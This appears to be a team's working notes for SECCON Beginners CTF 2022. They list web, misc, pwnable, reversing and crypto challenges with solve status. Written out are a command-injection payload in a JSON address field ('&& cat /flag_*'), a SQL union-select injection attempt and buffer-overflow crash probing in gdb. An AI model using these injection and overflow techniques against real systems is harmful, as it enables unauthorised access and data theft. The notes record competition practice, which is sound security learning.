SECCON Beginners CTF 2022 === ## 日程 2022/6/4 (土) 14:00 JST から 2022/6/5 (日) 14:00 JST まで ## スコアサーバー https://score.beginners.azure.noc.seccon.jp/ ### 回答のフォーマット フラグのフォーマットは ctf4b{[\x20-\x7e]+} ## 問題 --- ### web #### Util 藤島（回答済み） ```bash= curl -L -X POST https://util.quals.beginners.seccon.jp/util/ping \ -H "Content-Type: application/json" \ -d '{"address":"127.0.0.1 && cat /flag_*"}' ``` #### textex 藤島（中断） #### gallery　　藤島(中断) #### serial　藤島 林(中断) ```php= print("SELECT id, name, password_hash FROM users WHERE name = 'aaa' union select -1 as id, body as name, null as password_hash from FLAGS where name != '' LIMIT 1"); # $user->nameにunion selectをinjectionしたいけど「'」がエスケープされるから・・・ $sql = "SELECT id, name, password_hash FROM users WHERE name = '" . $user->name . "' LIMIT 1"; ``` #### Ironhand　　藤島（中断） --- ### misc #### phisher 林（中断） ``` bash= nc phisher.quals.beginners.seccon.jp 44322 ``` #### H2 藤島(回答済み) ```go= if r.URL.Path == SECRET_PATH { w.Header().Set("x-flag", "<secret>") } ``` pcapファイルWireSharkで開いてみる `http2.header.name == x-flag`で検索 #### ultra_super_miracle_validator #### hitchihike4b　藤島(中断) ```bash= $ nc hitchhike4b.quals.beginners.seccon.jp 55433 ``` ``` help> __main__ Help on module __main__: NAME __main__ DATA __annotations__ = {} flag1 = 'ctf4b{53cc0n_15_1n_m' FILE /home/ctf/hitchhike4b/app_35f13ca33b0cc8c9e7d723b78627d39aceeac1fc.py ``` --- ### pwnable #### BeginnersBof 藤島（中断） [参考になりそう](https://gist.github.com/matsubara0507/72dc50c89200a09f7c61) [参考になりそう2](https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/) ```bash= $ python3 -c "print(960, 'A'*960, sep='\n')" > input.txt $ gdb -q chall ``` ```gdb (gdb) run < input.txt Starting program: /root/chall < input.txt [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". How long is your name? What's your name? Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x0000000000401315 in main () ``` ```bash= $ python3 -c "print(961, 'A'*961, sep='\n')" > input.txt $ gdb -q chall ``` ```gdb (gdb) run < input.txt Starting program: /root/chall < input.txt [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". How long is your name? What's your name? Program received signal SIGSEGV, Segmentation fault. _IO_fgets (buf=0x7fffffffec40 'A' <repeats 200 times>..., n=961, fp=0x7ffff7fa9aa0 <_IO_2_1_stdin_>) at ./libio/iofgets.c:60 60 ./libio/iofgets.c: No such file or directory. ``` ```bash= $ objdump -d chall ... 00000000004011e6 <win>: 4011e6: 55 push %rbp 4011e7: 48 89 e5 mov %rsp,%rbp 4011ea: 48 81 ec 10 01 00 00 sub $0x110,%rsp 4011f1: be 00 00 00 00 mov $0x0,%esi 4011f6: 48 8d 3d 07 0e 00 00 lea 0xe07(%rip),%rdi # 402004 <_IO_stdin_used+0x4> 4011fd: b8 00 00 00 00 mov $0x0,%eax 401202: e8 c9 fe ff ff call 4010d0 <open@plt> 401207: 89 45 fc mov %eax,-0x4(%rbp) 40120a: 83 7d fc ff cmpl $0xffffffff,-0x4(%rbp) 40120e: 75 16 jne 401226 <win+0x40> 401210: 48 8d 35 f6 0d 00 00 lea 0xdf6(%rip),%rsi # 40200d <_IO_stdin_used+0xd> 401217: bf 01 00 00 00 mov $0x1,%edi 40121c: b8 00 00 00 00 mov $0x0,%eax 401221: e8 7a fe ff ff call 4010a0 <err@plt> 401226: 48 8d 8d f0 fe ff ff lea -0x110(%rbp),%rcx 40122d: 8b 45 fc mov -0x4(%rbp),%eax 401230: ba 00 01 00 00 mov $0x100,%edx 401235: 48 89 ce mov %rcx,%rsi 401238: 89 c7 mov %eax,%edi 40123a: e8 41 fe ff ff call 401080 <read@plt> 40123f: 48 89 c2 mov %rax,%rdx 401242: 48 8d 85 f0 fe ff ff lea -0x110(%rbp),%rax 401249: 48 89 c6 mov %rax,%rsi 40124c: bf 01 00 00 00 mov $0x1,%edi 401251: e8 ea fd ff ff call 401040 <write@plt> 401256: 8b 45 fc mov -0x4(%rbp),%eax 401259: 89 c7 mov %eax,%edi 40125b: e8 10 fe ff ff call 401070 <close@plt> 401260: 90 nop 401261: c9 leave 401262: c3 ret ``` #### raindrop #### simplelist #### snowdrop #### Monkey Heap --- ### reversing #### Quiz　解答済み #### WinTLS #### Recursive #### Ransom #### please_not_debug_me --- ### crypto #### omni-rsa #### Unpredicatable pad #### Command 林 ``` Encrypted command fizzbuzz = c549dbc31ae7232c2bf290d97abed3e461e018f0959d1246d79c8f1ae9800d0c Encrypted command primes = bc9a5c6d8a71384a04c8dedb177197bce98d4d8d7bfa9284bb778cb9ef7d1d33 ``` #### Prime party #### Coughing Fox 解答済み